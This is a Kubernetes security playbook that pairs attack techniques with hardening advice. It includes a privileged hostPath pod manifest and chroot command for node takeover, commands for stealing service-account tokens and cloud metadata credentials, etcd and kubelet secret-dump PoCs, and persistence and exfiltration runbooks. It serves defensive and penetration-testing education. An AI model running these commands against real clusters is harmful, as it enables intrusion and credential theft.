Kubernetes promises hard multi-tenancy, but the defaults are still optimistic. Attackers chain permissive pods, stale jump servers, broken RBAC, and flat networks to reach the control plane or underlying cloud. This playbook walks through real-world exploitation patterns and the tooling practitioners use to stay ahead.
Legal reminder: Only test clusters you own or have written consent to assess.
Threat Model Snapshot
| Layer | Weakness | Impact |
|---|---|---|
| Pod runtime | HostPath mounts, privileged containers, CAP_SYS_ADMIN | Node takeover, data exfiltration |
| Jump/Bastion hosts | Reused SSH keys, missing MFA, kubeconfig leakage | Control plane API access |
| RBAC | Wildcard verbs, system:masters bindings |
Full cluster administrative control |
| Network | Flat overlay, missing policies, mis-scoped egress | Lateral movement, data staging |
| Cloud glue | IAM roles, metadata service, load balancer creds | Cross-cluster pivot, persistence |
Additional High-Risk Misconfigurations
- Anonymous API Server Access –
--anonymous-auth=trueplus--authorization-mode=AlwaysAllow(seen in dev clusters) lets anyone runkubectlverbs. Fix by disabling anonymous auth and enabling Node/ABAC/RBAC. - Unauthenticated etcd – etcd listening on
0.0.0.0:2379without TLS exposes every secret and kubeconfig; lock it to localhost or private subnets with cert-based auth. - Disabled Admission Controllers – Without
PodSecurity,NodeRestriction, orImagePolicyWebhook, attackers can schedule privileged pods or run unscanned images freely. - Legacy Dashboard – The deprecated Kubernetes Dashboard 1.10 still defaults to cluster-admin; always require OIDC and restrict via NetworkPolicy.
- NodePort + ExternalLB Drift – Services exposed via NodePort remain reachable even after the LoadBalancer is deleted, creating forgotten entry points.
Exploiting Pods (Escape & Lateral)
1. HostPath & Privileged Pods
apiVersion: v1
kind: Pod
metadata:
name: vuln-pod
spec:
hostPID: true
containers:
- name: shell
image: alpine
securityContext:
privileged: true
volumeMounts:
- mountPath: /host
name: hostfs
volumes:
- name: hostfs
hostPath:
path: /
If you can create or edit such a pod:
kubectl exec -it vuln-pod -- chroot /host bash
Result: root shell on the node, access to /var/lib/kubelet, kubelet certs, and secrets cached on disk.
2. Automated Pod Hunting
- kube-hunter detects exposed dashboards, read-only ports, anonymous Kubelets.
pip install kube-hunter
kube-hunter --remote <worker-node-ip>
- kube-bench validates CIS benchmarks to catch privileged defaults.
kube-bench --targets node
- Popeye identifies risky pod specs (
allowPrivilegeEscalation,hostNetwork).
3. In-Cluster Pivot
Once inside a pod, enumerate service accounts:
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
APISERVER=https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_SERVICE_PORT
curl -s -k -H "Authorization: Bearer $TOKEN" $APISERVER/api
Look for mounted cloud credentials (AWS IMDS, GCP metadata, Oracle Cloud Instance Principals) to pivot beyond the node.
4. Host File Mount Abuse
Even without full hostPath /, apps often mount sensitive directories:
| Mount Type | Abuse | Mitigation |
|---|---|---|
/var/run/docker.sock |
Control container runtime, spawn privileged siblings | Use CRI proxy, never mount socket into workloads |
/etc slices |
Read node config, kubelet kubeconfig, tokens | Move secrets to CSI drivers; add readOnlyRootFilesystem |
/proc |
Scrape credentials, process arguments | DenyHostPath admission policy |
Static detection: kubectl get pods -A -o json | jq '.items[].spec.volumes[]? | select(.hostPath)'.
If you find writable mounts, plant cronjobs or tamper with systemd unit files for persistence.
5. Service Enumeration & Lateral Movement
- DNS sweep inside the cluster:
for svc in $(host -t SRV _http._tcp.default.svc.cluster.local | awk '{print $NF}'); do
echo "[+] $svc"; nc -vz $svc 80;
done
- Kubernetes API discovery even with limited RBAC:
kubectl get --raw /api | jq '.groups[].name'
-
ServiceAccount token reuse: stealing tokens from other pods (downward API, shared volumes) allows impersonation.
-
Sidecar hopping: if envoy/istio-proxy shares
/etc/istio/proxy/envoy-rev.json, use SDS certificates to reach other workloads over mTLS.
Combine enumeration with network policies: lack of egress restrictions lets compromised pods port-scan overlay CIDRs, locate database statefulsets, and exfiltrate data.
Proof-of-Concept Exploits
| Vuln | POC | Impact |
|---|---|---|
| Kubelet unauth read-only port (10255) | curl http://node-ip:10255/pods |
Dumps running pod specs (env vars, secrets) for credential theft |
| Exposed metrics-server/heapster | curl -k https://node-ip:4443/metrics |
Reveals cluster layout, token-bearing pods |
| Default ServiceAccount token reuse | kubectl run steal --image=alpine --overrides='{"spec":{"serviceAccountName":"default"}}' --command -- cat /var/run/secrets/... |
Pivot within namespace, list secrets |
| NodePort admin panel | nmap -sT node-ip -p30000-32767 then curl http://node-ip:31000/ |
Accesses dashboards meant to be internal |
| Etcd without TLS/auth | ETCDCTL_API=3 etcdctl --endpoints=http://control-plane:2379 get / --prefix |
Dump every secret in cluster |
Exploit lab recipe: deploy kubernetes-goat or OWASP KubeGoat to safely reproduce these paths.
Jump Server Vulnerabilities
Most production clusters hide API servers behind bastions or Zero Trust brokers. Common gaps:
- Shared SSH keys across bastions; one compromised engineer laptop unlocks every cluster.
- Cached kubeconfig on jump hosts without disk encryption.
- kubectl binaries with outdated plugins granting unintended verbs.
Hardening Moves
- Use short-lived certificates from cert-manager or external CA; avoid long-lived
admin.conffiles. - Enforce MFA-backed SSH (e.g., Teleport, AWS IAM Identity Center) for bastions.
- Auto-wipe
~/.kubeand credential helpers post-session. - Monitor
kubectl proxyandkubectl port-forwardusage from bastions; they often precede exfiltration.
RBAC Abuse Catalogue
| Misconfig | Exploit | Detection |
|---|---|---|
ClusterRole with verbs: ["*"] bound to system:serviceaccounts |
Impersonate cluster admin via compromised service account | kubectl auth can-i --list for each service account |
RoleBinding to system:masters |
Immediate god-mode | Audit subjects in every binding |
Missing resourceNames on secrets/configmaps |
Enumerate entire namespace secrets | Enable BoundServiceAccountTokenVolume + OIDC audiences |
| Default service account auto-mounted | Pod compromise -> namespace takeover | Set automountServiceAccountToken: false by default |
Automation tip: Use rwxrob/kubectl-who-can or kubectl-who-can (krew plugin) to enumerate privileges programmatically.
kubectl who-can get secrets
Network Segmentation Reality Check
Many orgs rely solely on CNI defaults (flannel, Calico, Cilium) without policies. Attack chain:
- Compromise one workload.
- Discover
kube-systemservices viakubectl get svc -A(if RBAC allows) or direct DNS queries. - Connect to internal dashboards, metrics, etc.
Network Policy Patterns
- Default deny in every namespace:
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
name: default-deny
spec:
podSelector: {}
policyTypes: [Ingress, Egress]
- Egress control for internet-bound pods to stop data staging:
spec:
egress:
- to:
- ipBlock:
cidr: 0.0.0.0/0
ports:
- protocol: TCP
port: 443
- Layer with service mesh policies (Istio AuthorizationPolicy, Linkerd ServerAuthz) for mTLS and authz.
Multi-Cloud Nuances
AWS (EKS)
- Nodes assume IAM roles: pod compromise →
curl 169.254.169.254/latest/meta-data/iam/security-credentials/ROLEfor creds. - Control plane access via AWS API: stolen IAM keys may create new kubeconfigs (
aws eks update-kubeconfig). - Use IRSA (IAM roles for service accounts) with scoped policies; monitor CloudTrail for
sts:AssumeRoleWithWebIdentityanomalies.
GCP (GKE)
- Metadata endpoint accessible at
http://metadata.google.internal. TargetMetadata-Flavor: Googleheader. - Workload Identity binds service accounts to Google service accounts; misbinding leads to broad
Editorrights. - Audit
gcloud container clusters get-credentialsusage and restrictcontainer.clusters.getCredentialsIAM.
Oracle Cloud (OKE / OPC)
- Instance principal tokens retrievable via
curl http://169.254.169.254/opc/v2/instance/withAuthorization: Bearer Oracle. - Compartments control segmentation; mis-scoped dynamic groups let pods call OCI APIs (block storage, networking).
- Lock down
oci iam dynamic-grouppolicies so only specific OKE node pools can call high-impact services.
Multi-Cloud Spread Patterns
Attackers rarely stop at one provider:
- Federated kubeconfigs stored in password managers or Git repos grant access to dev clusters on other clouds.
- CI/CD runners (GitHub Actions self-hosted, GitLab, Jenkins) often have kube contexts for multiple clusters—compromise the runner and export
KUBECONFIGto hop clouds. - Service meshes spanning regions (Anthos, Azure Arc) use control planes with static client certs; stealing those certs unlocks every attached cluster.
- Central registries (ECR, GCR, ACR, OCIR) host images for every environment; pushing a poisoned base image compromises workloads wherever deployed.
Defensive play: enforce per-cloud workload identities (IRSA, GCP Workload Identity, OCI dynamic groups) with scoped policies, and rotate secrets whenever any cluster reports a breach.
Tool Stack
| Tool | Use Case | Notes |
|---|---|---|
| kube-hunter | Surface network exposures (dashboards, etcd, ports) | Run with --report json for CI ingestion |
| kube-bench | CIS compliance for control plane/nodes | Map failures to remediation backlog |
| Popeye | Hygiene scanner for namespaces/pods | Highlights deprecated APIs and insecure specs |
| Kubescape / Kubeaudit | Policy testing vs NSA/CISA hardening guide | Integrates with Argo/GitHub Actions |
| KubeArmor / Falco | Runtime detection (syscalls, Kubernetes audit logs) | Deploy DaemonSets per node |
| Trivy | Image + cluster config scanning | trivy k8s --report summary cluster |
Automation example (GitHub Actions):
- name: kube-hunter (passive)
run: kube-hunter --cidr 10.0.0.0/16 --report json > kube-hunter.json
- name: kube-bench
run: kube-bench --targets master --json > kube-bench.json
- uses: aquasecurity/trivy-action@master
with:
scan-type: k8s
format: json
output: trivy-cluster.json
Jump Host to Cluster Attack Runbook
- Initial foothold on bastion via phishing or leaked SSH key.
- Harvest kubeconfig and tokens from
~/.kube, AWS/GCP/Azure CLIs. - Test access:
kubectl get nodes(watch for audit logs!). - Enumerate RBAC and attempt privilege escalation (impersonation, token review).
- Drop privileged pod to obtain node root.
- Exfiltrate secrets (KMS data, docker registry creds) or stage persistence (mutating admission controller, CronJob backdoor).
Defensible Architecture Checklist
- Admission control: Gatekeeper/kyverno enforcing
privileged=false, preventing hostPath except allowlist. - Short-lived credentials: Integrate with SPIRE/SPIFFE or workload identity providers.
- Rotate kubelet client certs and disable anonymous auth.
- Enable audit logging with sinks to SIEM; correlate
kubectl execandport-forwardevents. - Segment networks: separate node subnets per environment (dev/prod), restrict pod egress with eBPF-based CNIs.
- Disaster drills: Practice rotating service account tokens, regenerating kubeconfigs, and revoking IAM roles when a node is owned.
Rapid Remediation Playbook
| Threat | Immediate Fix | Longer-Term Control |
|---|---|---|
| HostPath/privileged pods | Delete offending pods, cordon node, rotate kubelet certs | Gatekeeper/Kyverno policies, Pod Security Standards restricted profile |
| Lateral movement via services | Apply namespace-wide default-deny NetworkPolicies, revoke compromised ServiceAccount tokens | Service mesh authz, per-namespace egress firewalls |
| Jump host compromise | Rotate all kubeconfigs, invalidate IAM keys, rebuild bastion from golden image | Implement ephemeral bastions with MFA + short-lived certs |
| RBAC wildcard roles | Remove bindings, run kubectl auth reconciler to reapply hardened RBAC |
CI guardrails preventing * verbs and namespace-wide bindings |
| Multi-cloud credential drift | Audit vaults/password managers for stale kubeconfigs, rotate registry creds | Central secret inventory with expiry, adopt SPIFFE/SPIRE across clusters |
Document every remediation in runbooks so incident responders can execute without reinventing the plan.
Further Reading & References
- NSA/CISA Kubernetes Hardening Guidance
- CNCF Kubernetes Security Audit
- Aqua kube-hunter
- Aqua kube-bench
- Falco Runtime Security
- Oracle Cloud Security Best Practices
By PlaidNox Security Team
Revised Nov 2025